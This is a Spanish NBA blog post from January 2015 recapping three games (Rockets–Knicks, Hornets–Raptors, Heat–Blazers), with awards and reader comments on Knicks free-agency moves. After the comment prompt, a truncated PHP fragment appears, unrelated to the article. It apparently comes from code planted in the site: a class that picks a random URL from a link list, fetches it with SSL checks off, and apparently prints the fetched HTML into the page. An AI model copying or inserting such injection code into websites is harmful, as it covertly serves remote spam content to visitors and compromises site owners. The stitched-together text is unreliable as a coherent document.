La Crónica: La senda de los elefantes

09 de January de 2015 por MagicJohnson32

El Madison Square Garden fue una vez escenario de hazañas memorables. Jordan, Kobe, Reed, Miller o LeBron han dejado su rúbrica en las páginas doradas en las que se escribe la historia del MSG. Obtener la victoria allí suponía prestigio para el ganador. Hoy no es así. El célebre pabellón de los Knicks no ve una victoria local desde noviembre y la intuición nos dicta que no verá muchas lo que resta de temporada. Además de la enésima humillación de los Knicks, hay que destacar a dos equipos en forma, Hornets y Blazers, que se llevaron sendas victorias para confirmar sus momentos.

Os lo contamos a continuación.

knicks_fans

Houston Rockets 120 – NY Knicks 96

Travis Wear. Cleanthony Early. Lagnston Galloway. Muchos aficionados no reconocerán estos nombres pero anoche fueron, con diferencia, los mejores jugadores de los Knicks. Pese a sus meritorias actuaciones, poco o nada pudieron hacer para evitar la humillación -una más para la colección- vivida en el Madison Square Garden, cuyo sufrido público representa estos días mejor que nunca aquella “senda de los elefantes” a la que hacía referencia Andrés Montes. La imagen de los fans en primera fila con bolsas de papel en la cabeza, impagable. Los Rockets aprovecharon el ‘paseo’ para retomar el paso en su carrera por obtener una de las primeras cuatro plazas del Oeste y la ventaja de campo en la primera ronda de Playoffs. Los Knicks, en cambio, se sitúan en la pole position para hacerse con el número 1 del draft.

Charlotte Hornets 103 – Toronto Raptors 95

Han tenido que lesionarse Lance Stephenson y Al Jefferson para que viésemos los mejores Hornets de la temporada, unos parecidos a los que imaginábamos antes del inicio del curso, claros aspirantes a los Playoffs y en estos momentos ganadores de cuatro partidos consecutivos tras imponerse anoche en Toronto a lomos de las excelentes actuaciones de Kemba y Gerald Henderson. Los Raptors, en cambio, han acusado la gira de seis partidos y finalmente la baja de DeRozan se ha empezado a notar. Valanciunas ha perdido impacto, Lowry (ovacionado en su primer partido local tras ser elegido MVP de diciembre en la Conferencia Este) sigue a nivel estelar pero sin la efectividad de semanas atrás y en general el juego de los de Casey no tiene el brillo del arranque de temporada. La cuarta derrota consecutiva aleja a los Raptors de Atlanta Hawks en la cabeza del Este y los iguala con los Wizards, medio partido por detrás de los Bulls.

Miami Heat 83 – Portland TrailBlazers 99

Nadie tiene más victorias que los Blazers. 28 con la de anoche, lograda ante Miami de forma muy clara tras una excelente segunda mitad en la que los de Oregon evidenciaron su superioridad. Habían arrancado mejor los Heat, que mantuvieron la iniciativa del partido de la mano de Wade hasta el descanso. A la vuelta de vestuarios, todo cambió, los Blazers empezaron a acertar con los triples y a aprovechar la debilidad de los Heat en la pintura. Aldridge fue la constante a la que se agarraron los de Stotts en los malos momentos y en los buenos. Al final, la renta visitante fue tal que incluso hubo minutos para Claver.

PREMIOS

MVP: La baja de Al Jefferson ha abierto espacio en la zona para Kemba Walker. El ex de Connecticut lo está aprovechando a la perfección con partidos como el de ayer, en el que anotó 29 puntos, cogió 7 rebotes y repartió 8 asistencias.

Rookie: Los Knicks son un desastre y en esta situación la única ilusión que le queda a sus seguidores es la de fijarse en sus jóvenes. Buenos partidos de Cleanthony Early (16 puntos y 6 rebotes) y de Langston Galloway (19 puntos, 4 rebotes y 3 asistencias).

Sorpresa: Gerald Henderson anotó nada más y nada menos que 31 puntos; Travis Wear se fue a los 21, y Hassan Whiteside continúa dejando buenas sensaciones en Miami. Ayer fueron 10 puntos, 8 rebotes y 4 tapones en apenas 19 minutos.

Decepción: Ni José Calderón, ni Gary Neal, ni Kostas Papanikolau fueron capaces de anotar una canasta en juego en todo el partido.

Esfuerzo en vano: Kyle Lowry se topó de bruces con Kemba Walker y sus Bobcats, que están en racha. Sus 24 puntos, 7 rebotes y 7 asistencias fueron insuficientes para llevarse el partido.

Top 5

Imágenes | AP Photos / Getty Images

Comenta

10 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Espero que este ridículo de PJ a cargo de los Knicks se vea compensado por un plan en verano y no venda fanfarrias para la próxima FA,porque vamos,van a irse Marc o Aldridge a la Gran Manzana sólo por vivir en NY…

      Citar

  2. Vader dice:
    #2

    Lo que esta haciendo PJ es lo que tocaba desde hace tiempo en los Knicks, limpieza de plantilla.

    Quizas Marc y Lamarcus no picaran, pero R.Jackson y Monroe quizás si, más un buen rookie y jugadores de rol a un precio justo. Con eso en 2015 y en el este a soñar…

    Saludos

      Citar

  3. Ruxixón dice:
    #3

    Vader:
    Lo que esta haciendo PJ es lo que tocaba desde hace tiempo en los Knicks, limpieza de plantilla.

    Quizas Marc y Lamarcus no picaran, pero R.Jackson y Monroe quizás si, más un buen rookie y jugadores de rol a un precio justo. Con eso en 2015 y en el este a soñar…

    Saludos

    Ese debe ser el plan.

      Citar

  4. Azabel dice:
    #4

    Monroe ni de coña, los Pintosn acaban de regalarle casi 40 millones a Smith para poder igualar la oferta que venga de Monroe y tienen la prioridad

    Lamarcus Aldrigue? no lo veo con interes de jugar al lado de un 3/4 como melo, este ya se comio al Amare (en gran esplendor candidato al MVP) en el primer año por ocupar su espacio en la cancha, lo veo similar con Aldrigue

    y Marc seria la opcion, sobretodo si Menphis no puede ofrecer un contrato maximo, de logar este movimiento, con un centro de ese nivel y melo por fuera, podemos ver mucha luz en el horizonte de la gran manzana, pero solo en ese supuesto

      Citar

  5. Futurman dice:
    #5

    Memphis es el equipo que más dinero puede darle a Marc, así que no lo veo. LA no creo que cambie un proyecto ganador por los Knicks y Monroe…bueno, quien sabe.

    Lo ideal sería un Dragic + rookie + Asik/Monroe y tienen espacio de sobra para ello; pero no soy muy optimista.

      Citar

  6. Azabel dice:
    #6

    Futurman:
    Memphis es el equipo que más dinero puede darle a Marc, así que no lo veo. LA no creo que cambie un proyecto ganador por los Knicks y Monroe…bueno, quien sabe.

    Lo ideal sería un Dragic + rookie + Asik/Monroe y tienen espacio de sobra para ello; pero no soy muy optimista.

    Detroit puede igualar cualquier oferta por Monroe y viendo los ultimos 7 juegos, no lo van a dudar
    Dragic, es muy posible y es un excelente jugador, pero el no cambia la ecuacion en un equipo tan malo,
    Asik, estamos casi en la misma
    el Rookie? ni Wiggins puede ayudar en su año rookie, seria un milagro que consigan alguien como la gente

    es decir, aun con dragic, un pick 1, asik y melo, apenas serian un contendiente a PO, y solo contendiente

    Solo un jugador de elite como Marc puede mejorarlos

    una alternativa? que compren con sus expirings a Lopez y Deron, para juntarlos con Melo; los Nets deberian aceptar los contratos de Amare y Bargnani para limpiar sus libros

    un trio Deron, Lopez y Melo,serian casi garantia de PO, nada del otro mundo, pero una tripleta para al menos competir y no hacer este papelon

    Espero que Jackson se de cuenta que ningun agente libre ira a New York ante una oferta similar, SI HASTA CASI MELO SE VA!!!! o se arman mediante trades, como el que propongo, o sera una agencia libre pobre, sino que lo digan los Lakers los ultimos años que solo pudieron fichar un solo jugador decente como Nash y por un contrato excesivamente largo y caro

      Citar

  7. luismi_vallecas dice:
    #7

    No creo que Marc se vaya de Memphis, y menos a NYK que es una plantilla sin aspiraciones.En Memphis le adoran, parece que él está a gusto allí y Memphis tiene, al menos, equipo de segunda ronda aunque en el Oeste nunca se sabe. Se habla de un posible trade que llevaría a Jeff Green a Memphis a cambio de Prince y algo más. Creo que este cambio vendría genial a Memphis que conseguirían un alero que puede anotar y defender decentemente por un ex-jugador

      Citar

  8. Vader dice:
    #8

    Azabel:
    Monroe ni de coña, los Pintosn acaban de regalarle casi 40 millones a Smith para poder igualar la oferta que venga de Monroe y tienen la prioridad

    Lo siento pero creo que estais equivocados, Pistons no tiene preferencia. La tenian este pasado verano y sólo firmaron un año de contrato. Este próximo verano Monroe es agente libre SIN restricciones.

    Saludos

      Citar

  9. luismi_vallecas dice:
    #9

    Brandan Wright se va a los Suns a cambio de una ronda de draft

      Citar

  10. Vader dice:
    #10

    Y parece que Jeff Green a Menphis a cambio de Prince y una primera ronda. Gran movimiento de los Grizzlies que ciertamente necesitaban un poquito más de “talento” en las alas. Tengo muchas ganas de verlos jugar con Green si se confirma el traspaso.

    Este año el mercado esta muy animado y muy entretenido.

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>